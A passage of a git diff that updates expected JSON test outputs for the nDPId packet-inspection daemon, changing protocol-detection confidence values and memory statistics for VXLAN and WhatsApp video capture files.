02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1639650442953,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1500,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1500,"pkt_l4_len":1462,"thread_ts_msec":1639650442953,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAFyq9ZAABAERhwwKgWBcCoFgSNvhK1BbazIQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAWYiYxAAFcG+Kmd8OAjCgoUBAG7sKwSxDYzceyRzoAQAQUwxgAAAQEICjdZVJ\/1DDMxFgMDAHoCAAB2AwOCxvI5EXHPK47hHjBvMw\/BI06Lkop9Q1UWqJnwHHEN3CDzcy2bbZtRNimKWfvjKRYfjG8z06\/JyuimMrKvKOQk2BMDAAAuACsAAgMEADMAJAAdACDAmDgjswZAHJO96Fxo5TF\/yHycPaDsaAssE+9YRtxuEBQDAwABARcDAwP5a5IZfVeyKEpOW0ufVGHnS60wv8jhNGuVFX1zlQlbDVGUUfZZGketBg2YthNR92n\/MnYwVxVhLF8luCNg98YcDHmLLzoHZsL49nDI+l9FD1r3wmiZMWL0y3yQZ\/JJQKcjOwcRiF5wjYIImRQjdfRPMVOpZX\/eVRUbhOETdoAwwjdl+orOFnHqlPn5W8zlz4vJR9+aKEMgg4VpLfA7gJ9BUce3E1AaydUD+XJnWAEIHLgcGKblAISRpe7EvwEoeN3STwz5TvBkeELGXhsRX3VYe06CV9GB9VUiMOxvkOe31kzQb1w5L8Q9dutguKq4auDiRIQdo3UPxjULEUEc8daV3AVkJf2C1IybYidwRoHGi86ATrnZfFObldSoDiKx4JXrwos9QDOQpTdBNWZYx1lo\/uqq\/8g1iPHfxsw1J8SNoIu5azXqXHRnZtnkXa0yFNP8rYYC0HNJXH5qFNBZ2p1fwoVg6AJX9XpDhAf\/k3osd3p+iDepC3IlVLkm+GmIka\/ZxprUZwNv+NGPRXYwQEVExWeySi4zMfz+B08WmlYQlxDWeXWgy2Izp8brlY84iY7t+GG4wm4JGr4A5KEWS58eKrUQrvPFR3jjXo6\/NCMu1YlygA+8c1qXjV+4IWGGMZkGFl87oSHi5P5ls+PzEck+yxjmOkP2mvhzrgr8cdbPj8RHsmNL+PETzQCtb1+I3PsP7AAQBnvJY2h7WghCBHgXKcXI9Fb91uYXjT0slYvTKjLrM+DmeFlzGURSW\/vAfQS1WzWshi0ZK\/8PHNQOsgSP5kX6vbKm1\/h4vdrSdq9Xy+3ChNYwY3Nz9UiRkomRmJoIRcqg8BPD4F7Li3UV4xy3ABlESzoqS14VkfVrJvF8Mssxb9uvKQB+Qftsw2prI4ct04qYspIUp+UyM6Y\/2OJhQWUzJBR7uDTVCn7cANa1qv5E81wp3WQIDI4BILWzecMZ++5JNOCdB5nQhfnz\/N46Rxh2m7dGQVsrhILqQg18vZWRXgsaYlpdWLllg3Cc33BYO\/+xQSxE5dvD+kHOSyP82e6eYHseshW7ln2FQDBjhnpBmuu8bKe+ZLkLevp6JoX4n7CIT23dcVV70UPfHzh3IBD9V+aD+PezeVtAGtuN4sZFohCJqTCjU\/XDcbZBeh6OfGZnUa850szjVLwzCcjXUP5B2l9n8SVTcXC3TF1cNpmTKwK01\/iJodz\/Q1ONsNdD4Jx8jY\/TLAlz4SJ+p7EPwFCMcwgZZKDl7ngwm0oPKncBrp0h2I0LOu793MxLBZwWgaM2KE3RBP2Qczs4SWP11UNQru+qxNl5EQLpinZejHt4hIt43rCVfRdXm2XDWme1jb1NB\/BYjxMUFwMDBe2NF\/B6RhuN92VOyJI6GV0+4MNlaQ2zRuSi41Qbfxms7nL+4fbQoszMAls3NvQOy8nluFZhTsFed4rEOfffnONOkD7LtY9K1a3OfMAvUkl3q6LpSyD0SRfScUpqPrYnKJKjotSjbJI1H3Jju7kYZHpZmKplW8uHRWRib1NTXyMtmkspyf4o9O8JqQuaFjRmqaxCy5szM8p4uCMgWJOsDWJwQOAiq9lsGYapphKG4xh87apARlJDtwJp7Pqq0l3QKmlxxFqvbS6YLtQFb\/KsIDWmRMf\/M0ylaAuf8pwk"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443097,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1639650443097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"thread_ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOIAABAEcmxwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YTAAAAAFAEAABE2gAA"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443097,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443097,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1639650443097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"thread_ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOJAABAEcmwwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YTAAAAAFAEAABE2gAA"} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1639650443097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"thread_ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOKAABAEcmvwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YUAAAAAFAEAABE2QAA"} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442902,"flow_last_seen":1639650442930,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1639650442941,"flow_last_seen":1639650443276,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":68647,"flow_avg_l4_payload_len":1225,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1639650442931,"flow_last_seen":1639650443276,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":3328,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639650442712,"flow_last_seen":1639650443088,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":388,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639650442720,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":5058,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442682,"flow_last_seen":1639650442711,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442902,"flow_last_seen":1639650442930,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1639650442941,"flow_last_seen":1639650443276,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":68647,"flow_avg_l4_payload_len":1225,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1639650442931,"flow_last_seen":1639650443276,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":3328,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639650442712,"flow_last_seen":1639650443088,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":388,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639650442720,"flow_last_seen":1639650443097,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":5058,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442682,"flow_last_seen":1639650442711,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","packets-captured":127,"packets-processed":127,"total-skipped-flows":0,"total-l4-payload-len":79480,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":53,"global_ts_msec":1639650443276} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 127/127 @@ -59,9 +59,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881606 bytes -~~ total memory freed........: 5881606 bytes -~~ total allocations/frees...: 118273/118273 +~~ total memory allocated....: 6015240 bytes +~~ total memory freed........: 6015240 bytes +~~ total allocations/frees...: 121035/121035 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2412 chars diff --git a/test/results/wa_video.pcap.out b/test/results/wa_video.pcap.out index d7cf2fd7b..9fe2a4ad3 100644 --- a/test/results/wa_video.pcap.out +++ b/test/results/wa_video.pcap.out @@ -2,30 +2,30 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1561455764448} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561455764448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455764448,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI0kIAAEARIhLAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455767339,"flow_last_seen":1561455767339,"flow_idle_time":7580000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":1,"thread_ts_msec":1561455767339,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01213{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455767339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1561455767339,"pkt":"xiwDYGpkkLkxKPrKCABFAAJYAABAAEAGw8bAqAIMnfAUNcDLFGab0R+KLuhMzoAYCAC1GwAAAQEICjTPJUoefmf9AAIh+FvbCnh\/a7IflRY0dljac\/EUrviXyMSuBINQo97GbKMEImMXigVRfinz4XcgTWeXa9giOjhsqf3NxGX9biqY1yfPHcFHJiCc0ZCHvaCNvgkJPVj4efQEO9oXblNeeRaKGRLTNPthw+X05ffa2MEEZsCc5sOdGdAvm7FUBTmDLJxrbHLFDC+Qz785Kp4Y\/nNC9dvuMTiwRIaMjyeDYd66NcNSVYXm4FIuAYawjSGgb9SDZkFGOfhJtHvzWqgQNk\/CQvD5MdFqw4Ro6oaWM5dtaU5byhQ5BGyiSFfIOfXO6utXNWA73iF5EEI1sUrW9Z96Yp1YyVWH1nWO8RF0xmRHhUXi8Z\/sZFez1+bI7zqAvAPYQUokFVSdoHMsl0C7omqMhJPL\/hGc9NtDl21eaiXOM52GOzZWxZMbXJmB\/9+NsouXUZBUgsh9jMSFGZLM23GdBqdyDiy78nD8F4EJr2A\/aUaJIwQnw3GNyvDzKtsy8d2KrzMKlf6d7qvFNf6tCn5YbJzbYCtXcK3bzzVNLm8QIxxktFuE4kwqNUk0pOIUno0bVHsn8uJRI7p6utCiNLoFNA283\/oV8xNqLi4LT4fQ\/\/415n+lAj9aAo0RTNMlYFu4h64\/Lu0dkox1O3c7ouf5f6puZ8pmi+uDZVI\/IU8sc3s7dCFETLgaxg8hmXkWbIHTksRKvfJv3iIyf9m9mqHEEfDnGMuE7VsJzvR+Imk61iI="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455767391,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455767391,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0cX4AAFMGgWyd8BQ1wKgCDBRmwMsu6EzOm9EhroAQALQFAQAAAQEICh5+dS80zyVK"} 